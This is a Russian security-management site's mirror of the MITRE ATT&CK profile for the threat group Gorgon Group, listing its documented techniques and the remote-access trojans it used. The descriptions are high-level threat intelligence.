Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Преступная группа Gorgon Group
Каталоги
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
Риски
Каталоги
MITRE ATT&CK
Преступная группа
Gorgon Group
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)
ID: G0078
Associated Groups: 
Version: 1.5
Created: 17 Oct 2018
Last Modified: 12 Oct 2021

Associated Group Descriptions
Name Description

Techniques Used
Domain ID Name Use
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)
.009 Boot or Logon Autostart Execution: Shortcut Modification

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)
.003 Command and Scripting Interpreter: Windows Command Shell

Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)

.005 Command and Scripting Interpreter: Visual Basic

Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Gorgon Group has used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden. (Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1588 .002 Obtain Capabilities: Tool

Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1566 .001 Phishing: Spearphishing Attachment

Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)
Enterprise T1055 .002 Process Injection: Portable Executable Injection

Gorgon Group malware can download a remote access tool, ShiftyBug, and inject into another process.(Citation: Unit 42 Gorgon Group Aug 2018)
.012 Process Injection: Process Hollowing

Gorgon Group malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1204 .002 User Execution: Malicious File

Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)

Software
ID Name References Techniques
S0332 Remcos (Citation: Fortinet Remcos Feb 2017) (Citation: Riskiq Remcos Jan 2018) (Citation: Talos Remcos Aug 2018) (Citation: Unit 42 Gorgon Group Aug 2018) Registry Run Keys / Startup Folder, Clipboard Data, Process Injection, Python, Proxy, Modify Registry, Obfuscated Files or Information, System Checks, Windows Command Shell, Bypass User Account Control, Screen Capture, Ingress Tool Transfer, Keylogging, Video Capture, File and Directory Discovery, Audio Capture
S0336 NanoCore (Citation: Cofense NanoCore Mar 2018) (Citation: DigiTrust NanoCore Jan 2017) (Citation: PaloAlto NanoCore Feb 2016) (Citation: Unit 42 Gorgon Group Aug 2018) Ingress Tool Transfer, Windows Command Shell, System Network Configuration Discovery, Video Capture, Disable or Modify System Firewall, Obfuscated Files or Information, Audio Capture, Visual Basic, Keylogging, Modify Registry, Symmetric Cryptography, Disable or Modify Tools, Registry Run Keys / Startup Folder, Uncommonly Used Port
S0385 njRAT (Citation: Bladabindi) (Citation: Fidelis njRAT June 2013) (Citation: FireEye Njw0rm Aug 2013) (Citation: LV) (Citation: Njw0rm) (Citation: Trend Micro njRAT 2018) (Citation: Unit 42 Gorgon Group Aug 2018) System Information Discovery, Credentials from Web Browsers, Application Window Discovery, Ingress Tool Transfer, File and Directory Discovery, Query Registry, Peripheral Device Discovery, Video Capture, Screen Capture, Native API, Remote System Discovery, File Deletion, PowerShell, Disable or Modify System Firewall, Obfuscated Files or Information, Standard Encoding, Compile After Delivery, Non-Standard Port, Replication Through Removable Media, System Owner/User Discovery, Registry Run Keys / Startup Folder, Remote Desktop Protocol, Uncommonly Used Port, Custom Command and Control Protocol, Keylogging, Web Protocols, Clear Persistence, Modify Registry, Exfiltration Over C2 Channel, Process Discovery, Fast Flux DNS, Indicator Removal, Windows Command Shell, Data from Local System
S0262 QuasarRAT (Citation: GitHub QuasarRAT) (Citation: Securelist APT10 March 2021) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Unit 42 Gorgon Group Aug 2018) (Citation: Volexity Patchwork June 2018) (Citation: xRAT) Remote Desktop Protocol, Keylogging, Symmetric Cryptography, Credentials from Web Browsers, Registry Run Keys / Startup Folder, Hidden Window, System Information Discovery, Ingress Tool Transfer, System Location Discovery, Modify Registry, Hidden Files and Directories, System Owner/User Discovery, Bypass User Account Control, Data from Local System, Non-Application Layer Protocol, System Network Configuration Discovery, Credentials from Password Stores, Credentials In Files, Windows Command Shell, Proxy, Non-Standard Port, Code Signing, Scheduled Task, Video Capture

References

  1. Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.